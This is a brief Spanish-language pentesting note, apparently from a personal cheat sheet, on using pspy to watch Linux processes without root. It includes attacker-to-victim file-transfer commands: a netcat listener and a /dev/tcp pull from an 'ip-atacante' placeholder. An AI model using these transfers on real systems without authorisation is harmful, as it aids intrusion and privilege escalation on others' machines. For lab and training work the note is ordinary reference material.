((https://github.com/DominicBreuker/pspy)) Una herramienta pata ver los procesos que estan ocurriendo en Linux, sin necesidad de ser root, ya que espera a que se ejecuten para detectarlo, también podemos ver el usuario (Nos da el UID que luego tendremos que revisar en el /etc/passwd) que lo ha ejecutado
./pspy64 -pf -i 1000 
para poder pasar el archivo podemos usar curl, wget o asi:
- Equipo del atacante
nc -nlvp 4444 < pspy64- victima
cat < /dev/tcp/ip-atacante/4444 >pspy64
para ver si se ha transferido correctamente podemos haccer un md5sum
